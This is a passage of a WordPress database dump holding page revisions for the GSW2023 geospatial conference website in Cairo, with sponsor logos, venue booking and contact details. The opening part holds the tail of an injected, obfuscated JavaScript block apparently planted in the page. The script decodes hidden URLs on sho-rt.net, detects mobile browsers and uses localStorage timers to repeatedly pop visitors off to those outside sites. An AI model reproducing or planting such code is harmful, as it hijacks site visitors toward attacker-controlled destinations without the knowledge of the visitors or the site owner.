_0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-08-15 04:29:29','2023-08-15 04:29:29','',3066,'https://gsw2023.com/?p=5198',0,'revision','',0),
(5199,1,'2023-08-15 04:33:26','2023-08-15 04:33:26','<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #0000ff;\"><strong>Under the Auspices of </strong></span>\r\n<span style=\"font-size: 24pt; color: #0000ff;\"><strong>H.E. Professor Mostafa Madbouly,</strong></span>\r\n<span style=\"font-size: 24pt; color: #0000ff;\"><strong>Prime Minister of the Arab Republic of Egypt</strong></span></h3>\r\n[vc_separator style=\"shadow\" border_width=\"10\"]\r\n<h4 style=\"text-align: center;\"><strong><span style=\"font-size: 24pt;\">Prime Sponsors</span></strong></h4>\r\n[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1687219449581{margin-top: 115px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1689081933017{margin-top: 145px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n<a href=\"https://www.tra.gov.eg/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5009 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/ntra-300x116.jpg\" alt=\"\" width=\"300\" height=\"116\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1689081968974{margin-top: 160px !important;}\"]\r\n\r\n<a href=\"https://www.mbrsc.ae/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5093 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/MBRSC-LOGO_1-01-300x149.png\" alt=\"\" width=\"300\" height=\"149\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1689081968955{margin-top: 115px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1689081337215{margin-top: 40px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689080719428{margin-top: 0px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>                    Platinum Sponsors</strong></span></h4>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689081395417{margin-top: 10px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\r\n<a href=\"https://abuqir.net/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5005\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/aboquir-239x300.png\" alt=\"\" width=\"193\" height=\"242\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]\r\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]\r\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\r\n<span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690460056235{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\r\n&nbsp;\r\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" />\r\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\r\n\r\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\r\n<a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\r\n<a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a>\r\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\r\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\r\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\r\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\r\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\r\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span>\r\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span>\r\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\r\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span>\r\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1691508515384{margin-top: 50px !important;}\"]</p>\r\n\r\n<h1 style=\"text-align: center;\">Journals partner</h1>\r\n<h3 style=\"text-align: center;\">The author has the opportunity to publish his/her articles in one of the following journals :</h3>\r\n&nbsp;\r\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https://www.springer.com/journal/43995/\"><span style=\"font-size: 14pt;\"><strong>Journal of Umm Al-Qura University for Engineering and Architecture</strong></span></a></span></p>\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><a href=\"http://www.springer.com/journal/43995\">www.springer.com/journal/43995</a></strong></span></p>\r\n\r\n<h3></h3>\r\n&nbsp;\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Journal of Engineering and Thermal Sciences (JETS) ISSN (Online) 2669-2465</strong></span></p>\r\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\"><a href=\"http://www.extrica.com/journal/jets\">www.extrica.com/journal/jets</a></span></strong></p>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]\r\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\r\n[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\r\n&nbsp;\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\r\n<h5></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fredirect%3Fpath%3Dasearch%26brandCode%3D6C%26localeCode%3Den%26regionCode%3D1%26hotelCode%3DCROHA%26checkInDate%3D01%26checkInMonthYear%3D082023%26checkOutDate%3D08%26checkOutMonthYear%3D082023%26rateCode%3DAAFST%26_PMID%3D99801505%26GPC%3DARA%26cn%3Dno%26viewfullsite%3Dtrue|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text 